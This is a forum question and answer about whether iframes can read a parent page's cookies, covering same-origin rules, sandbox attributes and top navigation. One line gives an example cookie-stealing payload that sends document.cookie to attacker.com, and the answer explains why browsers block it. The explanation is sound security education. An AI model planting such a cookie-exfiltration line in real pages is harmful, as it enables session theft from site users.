How can I confirm that embedded iframe cookies are readable from the parent?
Is there a way to confirm that an embedded iframe can read cookies from the parent?
I went through various articles regarding iframes and saw these lines in one of those - An IFrame (Inline Frame) is an HTML document embedded inside another HTML document on a website. The IFrame HTML element is often used to insert content from another source, such as an advertisement, into a Web page.
First thing to note is that iframe cookies (by default) don't act like they're part of the same origin, unless they are. If the iframe origin (in the src attribute) and the parent origin differ, the iframe will always be sandboxed from the parent. This imposes a bunch of restrictions, like being just unable to access most properties of the window.parent object.
You can make a same-origin iframe have the same kinds of restrictions as cross-origin iframes[1] by using the sandbox attribute. The values of the sandbox are exceptions to the sandbox attribute, not to the iframe security model in general. Thus, allow-same-origin doesn't make a cross-origin iframe act like it's same-origin to the parent page; it merely lets a same-origin iframe do the same-origin stuff that it could have done if it weren't sandboxed. If the parent and iframe are cross-origin, no amount of allow-same-origin or allow-top-navigation will fix that.
For iframes that are actually same-origin and are either not sandboxed or have the allow-same-origin sandbox attribute value, window.parent.[removed] will let you set or read (non-HttpOnly) cookies.
One approach that you might expect to work cross-origin is top navigation. Even cross-origin iframes can, if not sandboxed (or if the sandbox has allow-top-navigation), set (but not get) the URL of their parent. You might think this would let you do something like this: parent.location.href="[removed][removed].href='https://attacker.com/?cookie=' + [removed]" If that succeeded, it would execute javascript in the context of the parent page, and exfiltrate that page's (non-HttpOnly) cookies.
Fortunately, browser developers are wise to that sort of trick. An iframe (that is allowed top navigation) can point to the top page at many things, but a [removed] URI is not one of them.
Allowing untrusted iframes to do top navigation is still dangerous, of course. They may not be able to leverage it to inject scripts or steal cookies (not without an injection vulnerability, such as an XSS), but they can do things like navigate the user to a look-alike URL that displays the same content but is actually a phishing site, for example.
Of course, that doesn't exfiltrate the cookies, merely reveal that they're readable, but it's a way to exploit allow-top-navigation
And then some; the more extreme restrictions are stricter than the default cross-origin restrictions. This means that sandboxing cross-origin iframes isn't necessarily redundant. For example, cross-origin iframes are by default allowed most forms of top navigation and running scripts that don't try to interact with the window.parent object, but you can block those with sandboxing.